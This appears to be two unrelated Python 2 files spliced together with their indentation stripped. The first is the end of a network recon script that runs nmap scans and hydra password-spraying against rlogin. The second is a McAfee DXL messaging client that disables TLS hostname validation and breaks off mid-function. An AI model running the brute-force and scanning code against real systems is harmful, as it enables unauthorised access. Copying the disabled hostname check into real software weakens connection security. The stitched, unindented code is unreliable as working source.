#EDIT WITH USERNAME/PASSWORD LISTS
#RDPRECON in subdir in case multiple hydra.restore files
print "INFO: Enumerating RDP on %s:%s" % (ip_address, port)
subprocess.check_output(['rdp/./rdprecon.py',ip_address,port])
return
def rloginEnum(ip_address, port):
#Typically only 513, so we'll check
if port.strip() == "513":
print "INFO: Enumerating RLogin on %s:%s" % (ip_address, port)
try:
results = subprocess.check_output(['hydra','-L','/root/lists/userlist.txt','-P','/root/lists/quick_password_spray.txt','-f','-o','/root/scripts/recon_enum/results/exam/%s_rloginhydra' % (ip_address),'-u',ip_address,'rlogin']).split("\n")
for res in results:
if "login:" in res:
print "[*] Valid rlogin credentials found: " + res
except subprocess.CalledProcessError as hydrerr:
if hydrerr.returncode == 255:
print "Hydra broke early with status 255, it must have found something! Check rloginhydra for output."
print "Note you may need to download rsh-client."
elif hydrerr.returncode != 0:
print "Hydra broke:"
print hydrerr.returncode
print hydrerr.output
else:
print "INFO: No valid rlogin credentials found"
else:
print "Other rlogin services (exec/shell) detected. Recon manually: %s:%s" % (ip_address, port)
return
def sshEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
print "INFO: Enumerating SSH on %s:%s" % (ip_address, port)
subprocess.check_output(['./sshrecon.py',ip_address,port])
return
def snmpEnum(ip_address, port):
print "INFO: Enumerating snmp on %s:%s" % (ip_address, port)
subprocess.check_output(['./snmprecon.py',ip_address])
return
def smtpEnum(ip_address, port):
print "INFO: Enumerating smtp on %s:%s" % (ip_address, port)
if port.strip() == "25":
subprocess.check_output(['./smtprecon.py',ip_address])
else:
print "WARNING: SMTP detected on non-standard port, smtprecon skipped (must run manually)"
return
def smbEnum(ip_address, port):
print "INFO: Enumerating SMB on %s:%s" % (ip_address, port)
if port.strip() == "139":
subprocess.check_output(['./smbrecon.py',ip_address,port])
if port.strip() == "445":
subprocess.check_output(['./smbrecon.py',ip_address,port])
if port.strip() == "137":
subprocess.check_output(['./smbrecon.py',ip_address,port])
return
def telnetEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
#TELNETRECON in subdirectory in case ftp/ssh/mysql are present, hydra will have
#separate hydra.restore files
print "INFO: Enumerating Telnet on %s:%s" % (ip_address, port)
subprocess.check_output(['telnet/./telnetrecon.py',ip_address,port])
return
def tftpEnum(ip_address, port):
print "INFO: Enumerating TFTP on %s:%s" % (ip_address, port)
subprocess.check_output(['nmap','-n','-sV','-Pn','-vv','-p',port,'--script','tftp-enum,vulners','-oA',"/root/scripts/recon_enum/results/exam/tftp/%s_%s_tftp" % (ip_address,port),ip_address])
return
def nmapFullSlowScan(ip_address):
ip_address = ip_address.strip()
print "INFO: Running Full Slow TCP/UDP nmap scans for %s" % (ip_address)
tcplines = subprocess.check_output(['nmap','-n','-vv','--stats-every','30s','-Pn','-sT','-T','3','-p-','--max-retries','1','--min-rate',SLOW_NMAP_MIN_RATE,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%s_FULL" % ip_address,ip_address]).split("\n")
for line in tcplines:
line = line.strip()
if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
while "  " in line:
line = line.replace("  ", " ")
linesplit = line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
print ("INFO: Full Slow Nmap for %s found TCP: %s on %s") % (ip_address, service, port)
udplines = subprocess.check_output(['nmap','-n','-vv','--stats-every','30s','-Pn','-sU','-T','3','-p-','--max-retries','1','--min-rate',SLOW_NMAP_MIN_RATE,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%sU_FULL" % ip_address,ip_address]).split("\n")
for line in udplines:
line = line.strip()
if ("udp" in line) and ("open" in line) and not ("Discovered" in line):
while "  " in line:
line = line.replace("  ", " ")
linesplit = line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
print ("INFO: Full Slow Nmap for %s found UDP: %s on %s") % (ip_address, service, port)
print "INFO: Full Slow TCP/UDP Nmap scans completed for %s" % (ip_address)
return
#Be sure to change the interface if needed
#Nmap options used by the full TCP/UDP scans below:
# -n                  Do not do name service lookup
# -vv                 Be very verbose
# --stats-every 30s   Give stats every 30 seconds
# -Pn                 Treat hosts as online (skip host discovery)
# -sT / -sU           Full TCP connect / UDP scan, no syn machine guns
# -T3 / -T4           Timing template (3 for the slow scan, 4 for the fast scan)
# -p-                 Scan every port
# --max-retries 1     Only retry a port once
# --min-rate          Send packets at a minimum rate as defined
# -oA                 Give output in all three output formats
#
def nmapFullFastScan(ip_address):
ip_address = ip_address.strip()
print "INFO: Running Full Fast TCP/UDP nmap scans for " + ip_address
tcplines = subprocess.check_output(['nmap','-n','-vv','--stats-every','30s','-Pn','-sT','-T','4','-p-','--max-retries','1','--min-rate',FAST_NMAP_MIN_RATE,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%s_INITIAL" % ip_address,ip_address]).split("\n")
tcpPorts = []
udpPorts = []
for line in tcplines:
line = line.strip()
if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
while "  " in line:
line = line.replace("  ", " ")
linesplit = line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
tcpPorts.append(port)
print ("INFO: Full Fast Nmap for %s found TCP: %s on %s") % (ip_address, service, port)
for port in tcpPorts: #the last element in the list is blank
if port != "":
multProc(nmapVersionTCPAndPass, ip_address, port)
udplines = subprocess.check_output(['nmap','-n','-vv','--stats-every','30s','-Pn','-sU','-T','4','-p-','--max-retries','1','--min-rate',FAST_NMAP_MIN_RATE,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%sU_INITIAL" % ip_address,ip_address]).split("\n")
for line in udplines:
line = line.strip()
if ("udp" in line) and ("open" in line) and not ("Discovered" in line):
while "  " in line:
line = line.replace("  ", " ")
linesplit = line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
udpPorts.append(port)
print ("INFO: Full Fast for %s found UDP: %s on %s") % (ip_address, service, port)
for port in udpPorts: #the last element in the list is blank
if port != "":
multProc(nmapVersionUDPAndPass, ip_address, port)
print "INFO: Full Fast TCP/UDP nmap finished for %s. Tasks passed to designated scripts" % (ip_address)
jobs = []
q = multiprocessing.Process(target=nmapFullSlowScan, args=(ip_address,)) #comma needed to pass a single arg; use the local ip_address rather than the global scanip
jobs.append(q)
q.start()
return
def nmapVersionTCPAndPass(ip_address, port):
#need this to version ports and in case there is no recon module we'll have a scan for it. Runs default scripts.
uniNmapTCP = "nmap -n -vv -Pn -A -sC -sT -T 4 -p %s -oA '/root/scripts/recon_enum/results/exam/nmap/%s_%s' %s" % (port, ip_address, port, ip_address)
lines = subprocess.check_output(['nmap','-n','-vv','-Pn','-A','-sC','-sT','-T','4','-p',port,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%s_%s" % (ip_address,port),ip_address]).split("\n")
print "INFO: nmap version and pass for TCP %s:%s completed" % (ip_address, port)
for line in lines:
line = line.strip()
if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
while "  " in line:
line = line.replace("  ", " ")
linesplit = line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
if ("http" in service):
multProc(httpEnum, ip_address, port)
elif ("ajp13" in service):
multProc(jserveEnum, ip_address, port)
elif ("domain" in service): #don't want to miss if DNS is on TCP
multProc(dnsEnum, ip_address, port)
elif ("login" in service or "exec" in service or "shell" in service):
multProc(rloginEnum, ip_address, port)
elif ("finger" in service):
multProc(fingerEnum, ip_address, port)
elif ("ftp" in service):
multProc(ftpEnum, ip_address, port)
elif ("ldap" in service):
multProc(ldapEnum, ip_address, port)
elif ("netbios-ssn" in service):
multProc(smbEnum, ip_address,port)
elif ("microsoft-ds" in service):
multProc(smbEnum, ip_address, port)
elif ("ms-sql" in service or "mssql" in service):
multProc(mssqlEnum, ip_address, port)
elif ("my-sql" in service or "mysql" in service):
multProc(mysqlEnum, ip_address, port)
elif ("nfs" in service):
multProc(nfsEnum, ip_address, port)
elif ("rdp" in service or "ms-wbt-server" in service):
multProc(rdpEnum, ip_address, port)
elif ("rpcbind" == service):
multProc(rpcbindEnum, ip_address, port)
elif ("ssh/http" in service or "https" in service):
multProc(httpsEnum, ip_address, port)
elif ("ssh" in service):
multProc(sshEnum, ip_address, port)
elif ("smtp" in service):
multProc(smtpEnum, ip_address, port)
elif ("telnet" in service):
multProc(telnetEnum, ip_address, port)
elif ("tftp" in service):
multProc(tftpEnum, ip_address, port)
def nmapVersionUDPAndPass(ip_address, port):
uniNmapUDP = "nmap -n -vv -Pn -A -sC -sU -T 4 -p %s -oA '/root/scripts/recon_enum/results/exam/nmap/%s_%sU.nmap' %s" % (port, ip_address, port, ip_address)
lines = subprocess.check_output(['nmap','-n','-vv','-Pn','-A','-sC','-sU','-T','4','-p',port,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%s_%sU" % (ip_address,port),ip_address]).split("\n")
print "INFO: nmap version and pass for UDP %s:%s completed" % (ip_address, port)
for line in lines:
line = line.strip()
if ("udp" in line) and ("open" in line) and not ("Discovered" in line):
while "  " in line:
line = line.replace("  ", " ")
linesplit = line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
if ("domain" in service):
multProc(dnsEnum, ip_address, port)
elif ("snmp" in service):
multProc(snmpEnum, ip_address, port)
#makedir function from https://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python
#Compatible with Python >2.5, but there is a more advanced function for python 3.5
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: #Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
#Create the directories that are currently hardcoded in the script
#dotdotpwn directory for reports created automatically by dotdotpwn just in case user wants them
def createDirectories():
scriptsToRun = "dirb","dirb/80","dirb/443","dotdotpwn","finger","ftp","http","ldap","msrpc","mssql","mysql","nfs","nikto","nmap","rdp","rpc","smb","smtp","snmp","ssh","ssl","telnet","tftp","whatweb"
for path in scriptsToRun:
mkdir_p("/root/scripts/recon_enum/results/exam/%s" % path)
mkdir_p("/usr/share/dotdotpwn/Reports")
def backupExisting():
print "INFO: Previous folders found, zipping backup"
#tmp move targets.txt, zip files, backup, remove dirs, restore targets.txt
movedTargets = False
movedDotTemplate = False
if os.path.isfile("/root/scripts/recon_enum/results/exam/targets.txt"):
os.rename("/root/scripts/recon_enum/results/exam/targets.txt", "/root/scripts/recon_enum/results/targets.txt")
movedTargets = True
if os.path.isfile("/root/scripts/recon_enum/results/exam/dot_template"):
os.rename("/root/scripts/recon_enum/results/exam/dot_template", "/root/scripts/recon_enum/results/dot_template")
movedDotTemplate = True
backupName = "backup_%s.tar.gz" % (time.strftime("%H:%M"))
BACKUP = "tar czf /root/Downloads/%s /root/scripts/recon_enum/results/exam/* --remove-files" % (backupName)
backupResults = subprocess.check_output(BACKUP, shell=True)
if movedTargets == True:
os.rename("/root/scripts/recon_enum/results/targets.txt", "/root/scripts/recon_enum/results/exam/targets.txt")
if movedDotTemplate == True:
os.rename("/root/scripts/recon_enum/results/dot_template", "/root/scripts/recon_enum/results/exam/dot_template")
#Symlink needed directories into /usr/share/wordlists
#This functionality for a distro like Kali
#Wordlists folder used for ftp and ssh recon scripts
def mksymlink():
dirsToLink = "/root/lists","/root/lists/SecLists-master"
dst = "/usr/share/wordlists"
for path in dirsToLink:
tmp = path.split("/")
try:
os.symlink(path, dst + "/" + tmp[-1])
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
# grab the discovery scan results and start scanning hosts
def printBanner():
print "##############################################################"
print "#### RECON SCAN ####"
print "#### A multi-process service scanner ####"
print "#### finger, http, mssql, mysql, nfs, nmap, ####"
print "#### rdp, smb, smtp, snmp, ssh, telnet, tftp ####"
print "##############################################################"
print "############# Don't forget to start your TCPDUMP #############"
print "############ Don't forget to start your RESPONDER ############"
print "##############################################################"
print "##### This tool relies on many others. Please ensure you #####"
print "##### run setup.sh first and have all tools in your PATH #####"
print "##############################################################"
#The script creates the directories that the results will be placed in
#User needs to place the targets in the results/exam/targets.txt file
if __name__=='__main__':
printBanner()
if os.path.isdir('/root/scripts/recon_enum/results/exam/nmap'):
backupExisting()
mksymlink()
createDirectories()
# CHANGE THIS!! grab the alive hosts from the discovery scan for enum
# Also check Nmap user-agent string, should be set to Firefox or other
if os.path.isfile('/root/scripts/recon_enum/results/exam/targets.txt'):
if os.path.getsize('/root/scripts/recon_enum/results/exam/targets.txt') > 2: #0 is empty, 2 is file with \n
try:
f = open('/root/scripts/recon_enum/results/exam/targets.txt', 'r')
except:
raise
else:
print "ERROR: Is targets.txt blank?! Please ensure targets.txt is populated. Run aliverecon.py or something"
exit(0)
else:
print "ERROR: No targets.txt detected! Please ensure targets.txt is populated. Run aliverecon.py or something"
exit(0)
for scanip in f:
jobs = []
if scanip[0] != "#":
p = multiprocessing.Process(target=nmapFullFastScan, args=(scanip,)) #comma needed to only pass single arg
jobs.append(p)
p.start()
f.close()
|
client.py
|
# -*- coding: utf-8 -*-
################################################################################
# Copyright (c) 2017 McAfee Inc. - All Rights Reserved.
################################################################################
import threading
import logging
import ssl
import traceback
import random
import paho.mqtt.client as mqtt # pylint: disable=import-error
from dxlclient import _BaseObject
from dxlclient.client_config import DxlClientConfig
import dxlclient._callback_manager as callback_manager
from dxlclient._request_manager import RequestManager
from dxlclient.exceptions import DxlException
from dxlclient.message import Message, Event, Request, Response, ErrorResponse
from dxlclient._thread_pool import ThreadPool
from dxlclient.exceptions import _raise_wrapped_exception
from dxlclient.service import _ServiceManager
from dxlclient._uuid_generator import UuidGenerator
from _dxl_utils import DxlUtils
__all__ = [
# Callbacks
"_on_connect", "_on_disconnect", "_on_message", "_on_log",
# Client
"DxlClient",
# Constants
"DXL_ERR_AGAIN", "DXL_ERR_SUCCESS", "DXL_ERR_INVALID", "DXL_ERR_INTERRUPT",
]
logger = logging.getLogger(__name__)
DXL_ERR_AGAIN = -1
DXL_ERR_SUCCESS = 0
DXL_ERR_INVALID = 1
DXL_ERR_INTERRUPT = 2
################################################################################
#
# Callbacks
#
################################################################################
def _on_connect(client, userdata, rc): # pylint: disable=invalid-name
"""
Called when the broker responds to our connection request.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param rc: The result code
:return: None
"""
if userdata is None or not isinstance(userdata, DxlClient):
raise ValueError("User data object not specified")
self = userdata
with self._connected_lock:
self._connected = True
logger.debug("Connected with result code %s", str(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
with self._subscriptions_lock:
for subscription in self._subscriptions:
try:
logger.debug("Subscribing to %s", subscription)
client.subscribe(subscription)
except Exception as ex:
logger.error("Error during subscribe: %s", str(ex))
logger.debug(traceback.format_exc())
if self._service_manager:
self._service_manager.on_connect()
# Notify that connection status has changed
self._connected_wait_condition.notify_all()
def _on_disconnect(client, userdata, rc): # pylint: disable=invalid-name
"""
Called when the client disconnects from the broker.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param rc: The result code
:return: None
"""
t = threading.Thread(target=_on_disconnect_run, args=[client, userdata, rc])
t.daemon = True
t.start()
def _on_disconnect_run(client, userdata, rc): # pylint: disable=invalid-name
"""
Worker method that is invoked when the client disconnects from the broker.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param rc: The result code
:return: None
"""
# Remove unused parameter
del client
# Check userdata; this needs to be an instance of the DxlClient
if userdata is None or not isinstance(userdata, DxlClient):
raise ValueError("User data object not specified")
self = userdata
with self._connected_lock:
self._connected = False
self._connected_wait_condition.notify_all()
self._reset_current_broker()
if rc == 0:
logger.debug("Disconnected with result code %s", str(rc))
else:
logger.error("Unexpected disconnect with result code %s", str(rc))
# Disconnect the client
self._disconnect()
# Connect the client
if self.config.reconnect_when_disconnected:
self._start_connect_thread()
def _on_message(client, userdata, msg): # pylint: disable=invalid-name
"""
Called when a message has been received on a topic that the client subscribes to.
This callback will be called for every message received.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param msg: The message object
:return: None
"""
# Remove unused parameter
del client
# Check userdata; this needs to be an instance of the DxlClient
if userdata is None or not isinstance(userdata, DxlClient):
raise ValueError("Client reference not specified")
self = userdata
logger.debug("Message received for topic %s", msg.topic)
# TODO: The behavior is one thread per message, but the individual callbacks are handled sequentially.
# TODO: This is the same as in the Java client, but is not ideal. One plugin could block the whole
# TODO: execution.
try:
self._thread_pool.add_task(self._handle_message, channel=msg.topic, payload=msg.payload)
except Exception as ex: # pylint: disable=broad-except
logger.exception("Error handling message")
def _on_log(client, userdata, level, buf):
"""
Called when the client has log information. Define to allow debugging.
The level variable gives the severity of the message and will be one of
MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING, MQTT_LOG_ERR, and
MQTT_LOG_DEBUG. The message itself is in buf.
:param client: The Paho MQTT client reference
:param userdata: The user data object provided
:param level: The severity of the message
:param buf: The message itself
:return: None
"""
# Remove unused parameter
del client, userdata
if level == mqtt.MQTT_LOG_INFO:
logger.info("MQTT: %s", str(buf))
elif level == mqtt.MQTT_LOG_NOTICE:
logger.info("MQTT: %s", str(buf))
elif level == mqtt.MQTT_LOG_WARNING:
logger.warning("MQTT: %s", str(buf))
elif level == mqtt.MQTT_LOG_ERR:
logger.error("MQTT: %s", str(buf))
elif level == mqtt.MQTT_LOG_DEBUG:
logger.debug("MQTT: %s", str(buf))
################################################################################
#
# DxlClient
#
################################################################################
# pylint: disable=too-many-instance-attributes, invalid-name, too-many-public-methods
class DxlClient(_BaseObject):
"""
The :class:`DxlClient` class is responsible for all communication with the Data Exchange Layer (DXL)
fabric (it can be thought of as the "main" class). All other classes exist to support the functionality
provided by the client.
The following example demonstrates the configuration of a :class:`DxlClient` instance and
connecting it to the fabric:
.. code-block:: python
from dxlclient.broker import Broker
from dxlclient.client import DxlClient
from dxlclient.client_config import DxlClientConfig
# Create the client configuration
config = DxlClientConfig(
broker_ca_bundle="c:\\\\certs\\\\brokercerts.crt",
cert_file="c:\\\\certs\\\\client.crt",
private_key="c:\\\\certs\\\\client.key",
brokers=[Broker.parse("ssl://192.168.189.12")])
# Create the DXL client
with DxlClient(config) as dxl_client:
# Connect to the fabric
dxl_client.connect()
**NOTE:** The preferred way to construct the client is via the Python "with" statement as shown above. The "with"
statement ensures that resources associated with the client are properly cleaned up when the block is exited.
The following modules support the client:
- :mod:`dxlclient.client_config` : See this module for information on configuring the :class:`DxlClient`
- :mod:`dxlclient.message` : See this module for information on the different types of messages that can be
exchanged over the DXL fabric
- :mod:`dxlclient.callbacks` : See this module for information on registering "callbacks" that are used to
receive messages via the :class:`DxlClient`. This module also includes an example that demonstrate how to
send :class:`dxlclient.message.Event` messages.
- :mod:`dxlclient.service` : See this module for information on registering "services" with the DXL fabric.
This module also includes an example that demonstrates how to invoke a DXL service via the :class:`DxlClient`.
"""
# The default "reply-to" prefix. This is typically used for setting up response
# channels for requests, etc.
_REPLY_TO_PREFIX = "/mcafee/client/"
# The default wait time for a synchronous request, defaults to 1 hour
_DEFAULT_WAIT = 60 * 60
# The default wait for policy delay (in seconds)
_DEFAULT_WAIT_FOR_POLICY_DELAY = 2
# The default minimum amount of threads in a thread pool
_DEFAULT_MIN_POOL_SIZE = 10
# The default maximum amount of threads in a thread pool
_DEFAULT_MAX_POOL_SIZE = 25
# The default quality of service (QOS) for messages
_DEFAULT_QOS = 0
# The default connect wait
_DEFAULT_CONNECT_WAIT = 10 # seconds
def __init__(self, config):
"""
Constructor parameters:
:param config: The :class:`dxlclient.client_config.DxlClientConfig` object containing the configuration
settings for the client.
"""
super(DxlClient, self).__init__()
if config is None or not isinstance(config, DxlClientConfig):
raise ValueError("Client configuration not specified")
# The client configuration
self._config = config
# The lock for the client configuration
self._config_lock = threading.RLock()
# The condition associated with the client configuration
self._config_lock_condition = threading.Condition(self._config_lock)
# The flag for the connection state
self._connected = False
# The lock for the flag for the connection state
self._connected_lock = threading.RLock()
# The condition for the flag on connection state
self._connected_wait_condition = threading.Condition(self._connected_lock)
# The current broker the client is connected to
self._current_broker = None
# The lock for the current broker the client is connected to
self._current_broker_lock = threading.RLock()
# The default wait time for a synchronous request
self._default_wait = self._DEFAULT_WAIT
# The wait for policy delay (in seconds)
self._wait_for_policy_delay = self._DEFAULT_WAIT_FOR_POLICY_DELAY
# The minimum amount of threads in a thread pool
self._core_pool_size = self._DEFAULT_MIN_POOL_SIZE
# The maximum amount of threads in a thread pool
self._maximum_pool_size = self._DEFAULT_MAX_POOL_SIZE
# The quality of service (QOS) for messages
self._qos = self._DEFAULT_QOS
# The "reply-to" prefix. This is typically used for setting up response
# channels for requests, etc.
self._reply_to_topic = self._REPLY_TO_PREFIX + self._config._client_id
# The request callbacks manager
self._request_callbacks = callback_manager._RequestCallbackManager()
# The response callbacks manager
self._response_callbacks = callback_manager._ResponseCallbackManager()
# The event callbacks manager
self._event_callbacks = callback_manager._EventCallbackManager()
# The current list of subscriptions
self._subscriptions = set()
# The lock for the current list of subscriptions
self._subscriptions_lock = threading.RLock()
# The underlying MQTT client instance
self._client = mqtt.Client(client_id=self._config._client_id,
clean_session=True,
userdata=self,
protocol=mqtt.MQTTv31)
# The MQTT client connect callback
self._client.on_connect = _on_connect
# The MQTT client disconnect callback
self._client.on_disconnect = _on_disconnect
# The MQTT client message callback
self._client.on_message = _on_message
# The MQTT client log callback
if logger.isEnabledFor(logging.DEBUG):
self._client.on_log = _on_log
# pylint: disable=no-member
# The MQTT client TLS configuration
self._client.tls_set(config.broker_ca_bundle,
certfile=config.cert_file,
keyfile=config.private_key,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_SSLv23,
ciphers=None)
# The MQTT client TLS configuration to bypass hostname validation
self._client.tls_insecure_set(True)
# Generate a message pool prefix
self._message_pool_prefix = "DxlMessagePool-" + UuidGenerator.generate_id_as_string()
# The thread pool for message handling
self._thread_pool = ThreadPool(
num_threads=config.incoming_message_thread_pool_size,
queue_size=config.incoming_message_queue_size,
thread_prefix = self._message_pool_prefix)
# Subscribe to the client reply channel
self.subscribe(self._reply_to_topic)
# The request manager (manages synchronous and asynchronous request callbacks,
# notifications, etc.).
self._request_manager = RequestManager(client=self)
# The service manager (manages services request callbacks, notifications, etc.).
self._service_manager = _ServiceManager(client=self)
# The loop thread
self._thread = None
# The loop thread terminate flag
self._thread_terminate = False
# The lock for the connect thread
self._connect_wait_lock = threading.RLock()
# The condition associated with the client configuration
self._connect_wait_condition = threading.Condition(self._connect_wait_lock)
self._destroy_lock = threading.RLock()
self._destroyed = False
def __del__(self):
"""destructor"""
super(DxlClient, self).__del__()
self.destroy()
def __enter__(self):
"""Enter with"""
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Exit with"""
self.destroy()
@property
def config(self):
"""
The :class:`dxlclient.client_config.DxlClientConfig` instance that was specified when the
client was constructed.
See :mod:`dxlclient.client_config` for more information on configuring the client.
"""
with self._config_lock:
return self._config
@property
def connected(self):
"""Whether the client is currently connected to the DXL fabric."""
with self._connected_lock:
return self._connected
def connect(self):
"""
Attempts to connect the client to the DXL fabric.
This method does not return until either the client has connected to the fabric or it has exhausted
the number of retries configured for the client causing an exception to be raised.
Several attributes are available for controlling the client retry behavior:
- :attr:`dxlclient.client_config.DxlClientConfig.connect_retries` : The maximum number of connection attempts
for each :class:`dxlclient.broker.Broker` specified in the :class:`dxlclient.client_config.DxlClientConfig`
- :attr:`dxlclient.client_config.DxlClientConfig.reconnect_delay` : The initial delay between retry attempts.
The delay increases ("backs off") as subsequent connection attempts are made.
- :attr:`dxlclient.client_config.DxlClientConfig.reconnect_back_off_multiplier` : Multiples the current
reconnect delay by this value on subsequent connect retries. For example, a current delay of 3 seconds
with a multiplier of 2 would result in the next retry attempt being in 6 seconds.
- :attr:`dxlclient.client_config.DxlClientConfig.reconnect_delay_random` : A randomness delay percentage
(between 0.0 and 1.0) that is used to increase the current retry delay by a random amount for the purpose
of preventing multiple clients from having the same retry pattern
- :attr:`dxlclient.client_config.DxlClientConfig.reconnect_delay_max` : The maximum delay between retry attempts
"""
if self.connected:
raise DxlException("Already connected")
if self._thread is not None:
raise DxlException("Already trying to connect")
# Start the connect thread
self._start_connect_thread(connect_retries=self.config.connect_retries)
# Wait for the connect thread to finish
if self._thread is not None:
while self._thread.isAlive():
self._thread.join(1)
self._thread = None
# Wait for the callback to be invoked
with self._connected_lock:
if not self.connected:
self._connected_wait_condition.wait(5)
# Check if we were connected
if not self.connected:
raise DxlException("Failed to establish connection")
def _start_connect_thread(self, connect_retries=-1):
self._thread = threading.Thread(target=self._connect_thread_main, args=[connect_retries])
self._thread.daemon = True
self._thread.start()
def destroy(self):
"""
Destroys the client (releases all associated resources).
**NOTE:** Once the method has been invoked, no other calls should be made to the client.
Also note that this method should rarely be called directly. Instead, the preferred usage of the
client is via a Python "with" statement as shown below:
.. code-block:: python
# Create the DXL client
with DxlClient(config) as dxl_client:
# Connect to the fabric
dxl_client.connect()
The "with" statement ensures that resources associated with the client are properly cleaned up when the block
is exited (the :func:`destroy` method is invoked).
"""
with self._destroy_lock:
if not self._destroyed:
self._service_manager.destroy()
self._service_manager = None
self._request_manager.destroy()
self._request_manager = None
self.disconnect()
self._thread_pool.shutdown()
self._config = None
self._client.user_data_set( None )
self._client = None
self._destroyed = True
def disconnect(self):
"""
Attempts to disconnect the client from the DXL fabric.
"""
if self._connected:
self._disconnect()
else:
logger.warning("Trying to disconnect a disconnected client.")
def _disconnect(self):
if self._service_manager:
self._service_manager.on_disconnect()
logger.debug("Waiting for thread pool completion...")
self._thread_pool.wait_completion()
for subscription in self._subscriptions:
if self.connected:
try:
logger.debug("Unsubscribing from %s", subscription)
self._client.unsubscribe(subscription)
except Exception as ex: # pylint: disable=broad-except
logger.error("Error during unsubscribe: %s", str(ex))
logger.debug(traceback.format_exc())
# In case of a reconnect after connection loss, the event loop will
# not be stopped and the client will not be forcefully disconnected.
logger.debug("Stopping event loop...")
self._client.loop_stop()
logger.debug("Trying to disconnect client...")
self._client.disconnect()
logger.debug("Disconnected.")
# Make sure the connection loop is done
if self._thread is not None:
logger.debug("Waiting for the thread to terminate...")
self._thread_terminate = True
with self._connect_wait_lock:
self._connect_wait_condition.notifyAll()
while self._thread.isAlive():
self._thread.join(1)
self._thread = None
logger.debug("Thread terminated.")
def _connect_thread_main(self, connect_retries):
"""
The connection thread main function
"""
self._thread_terminate = False
self._loop_until_connected(connect_retries)
def _connect(self, brokers):
"""
Internal function that attempts to connect to one of the given brokers.
:param brokers: The (sorted) list of brokers
"""
self._reset_current_broker()
keep_alive_interval = self.config.keep_alive_interval
latest_ex = None
for broker in brokers:
if self._thread_terminate:
break
if broker._response_time is not None:
try:
if broker._response_from_ip_address:
logger.info("Trying to connect to broker %s...", broker.to_string())
self._client.connect(broker.ip_address, broker.port, keep_alive_interval)
else:
logger.info("Trying to connect to broker %s...", broker.to_string())
self._client.connect(broker.host_name, broker.port, keep_alive_interval)
self._current_broker = broker
break
except Exception as ex: # pylint: disable=broad-except
logger.error("Failed to connect to broker %s: %s",
broker.to_string(),
str(ex))
logger.debug(traceback.format_exc())
latest_ex = ex
if self._current_broker is None:
for broker in brokers:
if self._thread_terminate:
break
try:
logger.info(
"Trying to connect to broker (host name) %s...", broker.to_string())
self._client.connect(broker.host_name, broker.port, keep_alive_interval)
self._current_broker = broker
break
except Exception as ex: # pylint: disable=broad-except
logger.error("Failed to connect to broker (host name) %s: %s",
broker.to_string(), str(ex))
logger.debug(traceback.format_exc())
latest_ex = ex
if self._thread_terminate:
break
if self._current_broker is None and broker.ip_address is not None:
try:
logger.info(
"Trying to connect to broker (IP address) %s (%s:%d)...",
broker.unique_id, broker.ip_address, broker.port)
self._client.connect(broker.ip_address, broker.port, keep_alive_interval)
self._current_broker = broker
break
except Exception as ex: # pylint: disable=broad-except
logger.error("Failed to connect to broker (IP address) %s: %s",
broker.to_string(), str(ex))
logger.debug(traceback.format_exc())
latest_ex = ex
if self._current_broker is not None:
logger.info("Connected to broker %s",
self._current_broker.unique_id)
else:
if latest_ex is not None:
raise latest_ex # pylint: disable=raising-bad-type
def _loop_until_connected(self, connect_retries):
# The client is already connected
if self.connected:
logger.error("Already connected")
return DXL_ERR_INVALID
logger.info("Waiting for broker list...")
self._config_lock.acquire()
try:
while not self._thread_terminate and len(self._config.brokers) == 0:
self._config_lock_condition.wait(self._wait_for_policy_delay)
if len(self._config.brokers) == 0:
logger.debug("No broker defined. Waiting for broker list...")
finally:
self._config_lock.release()
if self._thread_terminate is True:
logger.debug("Stopping...")
return DXL_ERR_INTERRUPT
logger.debug("Checking brokers...")
brokers = self._config._get_sorted_broker_list()
logger.info("Trying to connect...")
retries = connect_retries
retry_delay = self.config.reconnect_delay
first_attempt = True
latest_ex = None
latest_ex_traceback = None
while not self._thread_terminate and (connect_retries < 0 or retries >= 0):
if not first_attempt:
# Determine retry delay
retry_delay_max = self.config.reconnect_delay_max
if retry_delay > retry_delay_max:
retry_delay = retry_delay_max
# Apply random after max (so we still have randomness, may exceed maximum)
retry_delay += ((self.config.reconnect_delay_random * retry_delay) * random.random())
logger.error("Retrying connect in %s seconds: %s", str(retry_delay), str(latest_ex))
# Wait...
with self._connect_wait_lock:
self._connect_wait_condition.wait(retry_delay)
# Update retry delay
retry_delay *= self.config.reconnect_back_off_multiplier
try:
self._connect(brokers)
break
except Exception as ex:
# Track latest exception
latest_ex = ex
latest_ex_traceback = traceback.format_exc()
first_attempt = False
retries -= 1
if self._thread_terminate is True:
logger.info("Stopping...")
return DXL_ERR_INTERRUPT
if not self._current_broker:
if latest_ex:
